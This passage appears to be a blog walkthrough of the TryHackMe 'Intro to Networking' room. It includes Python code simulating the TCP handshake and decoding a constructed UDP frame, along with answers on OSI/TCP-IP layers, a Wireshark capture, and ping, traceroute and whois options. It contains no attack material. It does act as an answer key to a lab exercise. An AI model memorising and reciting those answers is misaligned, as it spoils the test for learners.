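    seq: int               # sequence number carried by this segment
    ack: int = 0           # next sequence number the sender expects


@dataclass
class Endpoint:
    name: str
    state: str = "CLOSED"
    seq: int = 0           # next sequence number this side will send
    ack: int = 0           # next sequence number expected from the peer

    def listen(self):
        self.state = "LISTEN"

    def connect(self, peer: str) -> Segment:
        # Step 1: SYN. A fresh, unpredictable ISN makes it hard for an
        # off-path party to guess the numbers this connection will use.
        self.seq = secrets.randbelow(SEQ_MOD)
        self.state = "SYN_SENT"
        return Segment(self.name, peer, frozenset({"SYN"}), self.seq)

    def receive(self, seg: Segment):
        """Consume one segment; return the reply segment, or None."""
        if self.state == "LISTEN" and seg.flags == {"SYN"}:
            # Step 2: SYN-ACK. The SYN consumes one sequence number, so we
            # acknowledge ISN + 1 and offer our own ISN in return.
            self.ack = (seg.seq + 1) % SEQ_MOD
            self.seq = secrets.randbelow(SEQ_MOD)
            self.state = "SYN_RECEIVED"    # "half-open" until the final ACK arrives
            return Segment(self.name, seg.src, frozenset({"SYN", "ACK"}), self.seq, self.ack)
        if self.state == "SYN_SENT" and seg.flags == {"SYN", "ACK"}:
            # Step 3: ACK. Only accept a SYN-ACK that acknowledges exactly our ISN + 1.
            if seg.ack != (self.seq + 1) % SEQ_MOD:
                raise ValueError(f"{self.name}: SYN-ACK acknowledges the wrong sequence number")
            self.seq = (self.seq + 1) % SEQ_MOD
            self.ack = (seg.seq + 1) % SEQ_MOD
            self.state = "ESTABLISHED"
            return Segment(self.name, seg.src, frozenset({"ACK"}), self.seq, self.ack)
        if self.state == "SYN_RECEIVED" and seg.flags == {"ACK"}:
            if seg.ack != (self.seq + 1) % SEQ_MOD:
                raise ValueError(f"{self.name}: ACK does not match our SYN")
            self.seq = (self.seq + 1) % SEQ_MOD
            self.state = "ESTABLISHED"
            return None
        # Anything else is out of sequence for the current state (a stray ACK
        # to a listening socket, a second SYN while established, and so on).
        raise ValueError(f"{self.name}: unexpected {sorted(seg.flags)} in state {self.state}")


def handshake(client: Endpoint, server: Endpoint) -> list:
    """Run the full exchange and return the three segments in order."""
    server.listen()
    syn = client.connect(server.name)        # 1. SYN
    syn_ack = server.receive(syn)            # 2. SYN-ACK
    ack = client.receive(syn_ack)            # 3. ACK
    server.receive(ack)                      # server reaches ESTABLISHED
    return [syn, syn_ack, ack]


def accepts(endpoint: Endpoint, seg: Segment) -> bool:
    """True if the endpoint accepts the segment in its current state."""
    try:
        endpoint.receive(seg)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    c, s = Endpoint("client"), Endpoint("server")
    for seg in handshake(c, s):
        print(f"{seg.src} -> {seg.dst}: {'/'.join(sorted(seg.flags))} seq={seg.seq} ack={seg.ack}")
    print(c.state, s.state)
```

A server left in SYN_RECEIVED is a half-open connection; counting those is how SYN-flood monitoring on a host works.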

&lt;p&gt;&lt;strong&gt;Which model was introduced first, OSI or TCP/IP?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The first model to be introduced was the &lt;strong&gt;TCP/IP Model&lt;/strong&gt;, in 1982. The OSI Model was introduced two years later, in 1984.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;As we could see in our graph, the Transport Layer of the OSI Model has its functionalities covered by the &lt;strong&gt;Transport&lt;/strong&gt; Layer from the TCP/IP Model.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;As we could see in our graph, the Session Layer of the OSI Model has its functionalities covered by the &lt;strong&gt;Application&lt;/strong&gt; Layer from the TCP/IP Model.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;As we could see in our graph, the Network Interface layer covers the functionalities of the Data Link and the &lt;strong&gt;Physical&lt;/strong&gt; Layer from the OSI Model.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer of the TCP/IP model handles the functionality of the OSI network layer?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;As we could see in our graph, the Network Layer of the OSI Model has its functionalities covered by the &lt;strong&gt;Internet&lt;/strong&gt; Layer from the TCP/IP Model.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What kind of protocol is TCP?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;According to the Oracle Documentation, the TCP/IP Model is a &lt;strong&gt;Connection-Based&lt;/strong&gt; protocol.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What is SYN short for?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Synchronize&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What is the second step of the three way handshake?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SYN/ACK&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What is the short name for the "Acknowledgement" segment in the three-way handshake?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ACK&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Moving on to our first tool in this write-up, we open the .pcap file as suggested in the TryHackMe room - &lt;a href="https://tryhackme.com/room/introtonetworking" rel="noopener noreferrer"&gt;https://tryhackme.com/room/introtonetworking&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once we open the file in Wireshark and analyze the packets, we get the following information:&lt;/p&gt;

&lt;p&gt;1 - For the first packet&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkkjbtg0qfg6ubbg444e7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkkjbtg0qfg6ubbg444e7.png" alt="Wireshark first packet"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;2 - For the second packet&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkcdyl7dttlg3q5bvnocl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkcdyl7dttlg3q5bvnocl.png" alt="Wireshark second packet"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looking at the second packet, as suggested, we can start answering the questions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is the protocol specified in the section of the request that's linked to the Application layer of the OSI and TCP/IP Models?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Domain Name System&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer of the OSI model does the section that shows the IP address "172.16.16.77" link to (Name of the layer)?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yo4q4yuubgawjnudaf3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3yo4q4yuubgawjnudaf3.png" alt="Wireshark Network"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In the section of the request that links to the Transport layer of the OSI and TCP/IP models, which protocol is specified?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Wireshark displays the User Datagram Protocol (UDP).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq41ro541t3yj47yi1j3z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq41ro541t3yj47yi1j3z.png" alt="UDP"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Over what medium has this request been made (linked to the Data Link layer of the OSI model)?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ethernet II&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81cyug7hm7j8vkjalgu6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81cyug7hm7j8vkjalgu6.png" alt="EthernetII"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Which layer of the OSI model does the section that shows the number of bytes transferred (81) link to?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Frame 2 section, which reports the 81 bytes on the wire, links to the &lt;strong&gt;Physical Layer&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpxsjdq3zh997nyrdg3f7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpxsjdq3zh997nyrdg3f7.png" alt="Link to Physical Layer"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;[Research] Can you figure out what kind of address is shown in the layer linked to the Data Link layer of the OSI model?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;According to Pearson IT Certification, "a MAC address is a unique 6-byte address that is burned into each network interface or more specifically, directly into the PROM chip on the NIC. The number must be unique, as the MAC address is the basis by which almost all network communication takes place. No matter which networking protocol is being used, the MAC address is still the means by which the network interface is identified on the network. Notice that I say network interface. That’s very important, as a system that has more than one network card in it will have more than one MAC address." Given that definition, the address shown in the Ethernet II section is a &lt;strong&gt;MAC&lt;/strong&gt; address.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsb86n53ecm5udcchyjci.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsb86n53ecm5udcchyjci.png" alt="MAC Address"&gt;&lt;/a&gt;&lt;/p&gt;
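&lt;p&gt;As an added example (my own Python, not code from the original post or the TryHackMe room), the script below walks a constructed Ethernet II / IPv4 / UDP frame header by header, the way Wireshark's panes do, and tags each header with the OSI layer it maps to; it also checks that the link-layer address is exactly 6 bytes and reads its group and locally-administered bits. The frame is built inline to be 81 bytes like Frame 2 above, and its MAC and IP addresses are made-up values, not ones from the capture.&lt;/p&gt;

```python
"""Decode a constructed Ethernet II / IPv4 / UDP frame and map each header to
the OSI layer behind the corresponding Wireshark pane (Frame, Ethernet II,
Internet Protocol, User Datagram Protocol)."""
import struct

# OSI layer number behind each Wireshark pane of a UDP-over-Ethernet packet.
OSI_LAYER = {
    "Frame": 1,        # Physical: the bytes on the wire and their count
    "Ethernet II": 2,  # Data Link: 6-byte MAC addresses
    "IPv4": 3,         # Network: IPv4 addresses
    "UDP": 4,          # Transport: port numbers
}

ETHERTYPE_IPV4 = 0x0800
IPPROTO_UDP = 17


def format_mac(raw):
    """Render a 6-byte MAC as colon-separated hex; any other length is not a MAC."""
    if len(raw) != 6:
        raise ValueError(f"MAC address must be 6 bytes, got {len(raw)}")
    return ":".join(f"{octet:02x}" for octet in raw)


def mac_flags(raw):
    """Low two bits of the first octet: bit 0 set means group (multicast or
    broadcast), bit 1 set means locally administered rather than burned in."""
    first = raw[0]
    return {"group": first % 2 == 1, "locally_administered": (first // 2) % 2 == 1}


def decode_frame(frame):
    """Walk the frame header by header and report each layer's addressing."""
    try:
        dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
        if ethertype != ETHERTYPE_IPV4:
            raise ValueError(f"not IPv4, ethertype 0x{ethertype:04x}")
        (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum,
         src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", frame[14:34])
        version, ihl = ver_ihl // 16, (ver_ihl % 16) * 4   # high / low nibble
        if version != 4 or ihl not in range(20, 61):
            raise ValueError("malformed IPv4 header")
        if proto != IPPROTO_UDP:
            raise ValueError(f"not UDP, IP protocol {proto}")
        udp_start = 14 + ihl
        sport, dport, udp_len, _ucsum = struct.unpack(
            "!HHHH", frame[udp_start:udp_start + 8])
    except struct.error as exc:
        raise ValueError("frame truncated") from exc
    payload = frame[udp_start + 8:udp_start + udp_len]
    return {
        "Frame": {"osi_layer": OSI_LAYER["Frame"], "bytes_on_wire": len(frame)},
        "Ethernet II": {"osi_layer": OSI_LAYER["Ethernet II"],
                        "src_mac": format_mac(src), "dst_mac": format_mac(dst),
                        "src_flags": mac_flags(src)},
        "IPv4": {"osi_layer": OSI_LAYER["IPv4"],
                 "src_ip": ".".join(str(b) for b in src_ip),
                 "dst_ip": ".".join(str(b) for b in dst_ip),
                 "ttl": ttl, "total_length": total_len},
        "UDP": {"osi_layer": OSI_LAYER["UDP"], "src_port": sport,
                "dst_port": dport, "payload_len": len(payload)},
    }


def build_sample_frame():
    """Constructed 81-byte UDP datagram, the same size as the capture's Frame 2;
    the MACs and IPs are made-up / documentation values, not from the page."""
    dst_mac = bytes.fromhex("ffffffffffff")            # broadcast
    src_mac = bytes.fromhex("001122334455")            # constructed unicast MAC
    payload = b"constructed UDP payload for the example"  # 39 bytes
    udp_len = 8 + len(payload)
    ethernet = struct.pack("!6s6sH", dst_mac, src_mac, ETHERTYPE_IPV4)
    # IPv4: version 4 / IHL 5, total length, id, DF flag, TTL 64, UDP; the
    # checksum is left at zero because the decoder above does not verify it
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, 0x1234, 0x4000,
                       64, IPPROTO_UDP, 0, bytes([192, 0, 2, 10]), bytes([192, 0, 2, 53]))
    udp = struct.pack("!HHHH", 53000, 53, udp_len, 0)
    return ethernet + ipv4 + udp + payload


if __name__ == "__main__":
    for pane, info in decode_frame(build_sample_frame()).items():
        print(f"{pane:12} OSI layer {info['osi_layer']}: {info}")
```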




&lt;p&gt;With the theory behind us, it's time to move on to some practical work, using a few common tools to get a better understanding of the networks we are studying.&lt;/p&gt;

&lt;h1&gt;
  
  
  Networking Tools - Ping
&lt;/h1&gt;

&lt;p&gt;For starters, let's take a look at &lt;strong&gt;Ping.&lt;/strong&gt; This tool is used to test the connection between your machine and a remote target, either a web application or just another machine. Typing &lt;code&gt;ping -h&lt;/code&gt; in a Kali terminal lists all of the options related to this tool, which makes it easier to plan how to use it during daily tasks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9yp8zz9x9fajae2kcwbw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9yp8zz9x9fajae2kcwbw.png" alt="Ping Help"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For a more detailed explanation and a deep dive into the documentation, you can also type &lt;code&gt;man ping&lt;/code&gt; to access its manual, which we are going to do in order to answer the following questions.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What command would you use to ping the &lt;a href="http://bbc.co.uk/" rel="noopener noreferrer"&gt;bbc.co.uk&lt;/a&gt; website?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To ping any host, you simply write &lt;code&gt;ping&lt;/code&gt; followed by the website's hostname or IP address. So, in this case, the answer is simply &lt;strong&gt;ping bbc.co.uk&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ping &lt;a href="http://muirlandoracle.co.uk/" rel="noopener noreferrer"&gt;muirlandoracle.co.uk&lt;/a&gt;. What is the IPv4 address?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;By running &lt;code&gt;ping muirlandoracle.co.uk&lt;/code&gt; we can test the connection to that website, and the output also shows us the website's IPv4 address.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsoaj26jsb0v3oq7bjj4d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsoaj26jsb0v3oq7bjj4d.png" alt="Ping Website"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What switch lets you change the interval of sent ping requests?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9w8eok9smpqrn0fksn7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9w8eok9smpqrn0fksn7.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What switch would allow you to restrict requests to IPv4?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq1yln94mud6d90604uk6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq1yln94mud6d90604uk6.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What switch would give you a more verbose output&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7zpsqnql1oiesj3pc43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7zpsqnql1oiesj3pc43.png" alt="Verbose"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Networking Tools - Traceroute
&lt;/h1&gt;

&lt;p&gt;Traceroute is another really useful tool, since it can follow the path packets take from your machine to the desired endpoint. If it's not installed by default on your Kali Linux, simply run &lt;code&gt;apt-get install traceroute&lt;/code&gt; to install it.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What switch would you use to specify an interface when using Traceroute?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hsqhmugunw23wfk9iip.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hsqhmugunw23wfk9iip.png" alt="Interface"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What switch would you use if you wanted to use TCP SYN requests when tracing the route?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5dw05nk0vga3x9cu7nu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5dw05nk0vga3x9cu7nu.png" alt="Traceroute TCP"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;[Lateral Thinking] Which layer of the TCP/IP model will traceroute run on by default (Windows)?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We know that by default the Windows traceroute utility (tracert) uses the same ICMP protocol that ping uses, which sits at the &lt;strong&gt;Internet&lt;/strong&gt; layer of the TCP/IP model.&lt;/p&gt;




&lt;h1&gt;
  
  
  Networking Tools - WHOIS
&lt;/h1&gt;

&lt;p&gt;Most internet traffic relies on DNS, the Domain Name System, which lets us reach Google by simply typing &lt;a href="http://google.com" rel="noopener noreferrer"&gt;google.com&lt;/a&gt; in our browsers instead of some nasty, hard-to-remember four-octet IP address. Building on that, &lt;strong&gt;whois&lt;/strong&gt; is a tool that retrieves registration information about a website when all we know is its domain name. So, for example, if we want more information on Google, we simply type &lt;code&gt;whois google.com&lt;/code&gt; and are presented with a whole lot of information.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ful75o99al780gfft6npw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ful75o99al780gfft6npw.png" alt="Whois"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Perform a whois search on &lt;a href="http://facebook.com/" rel="noopener noreferrer"&gt;facebook.com&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff4jei3x3ij6f5owzj9p9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff4jei3x3ij6f5owzj9p9.png" alt="Whois Facebook"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What is the registrant postal code for &lt;a href="http://facebook.com/" rel="noopener noreferrer"&gt;facebook.com&lt;/a&gt;?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fefilrwc2ijqscz0npg5g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fefilrwc2ijqscz0npg5g.png" alt="Postal Code"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;When was the &lt;a href="http://facebook.com/" rel="noopener noreferrer"&gt;facebook.com&lt;/a&gt; domain first registered?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzp5700zhti3vnrht6bhj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzp5700zhti3vnrht6bhj.png" alt="Date"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Perform a whois search on &lt;a href="http://microsoft.com/" rel="noopener noreferrer"&gt;microsoft.com&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz964h5ceu8x31bcn3z2c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz964h5ceu8x31bcn3z2c.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Which city is the registrant based in?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6vysf7rmhffxg2fadgns.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6vysf7rmhffxg2fadgns.png" alt="City"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
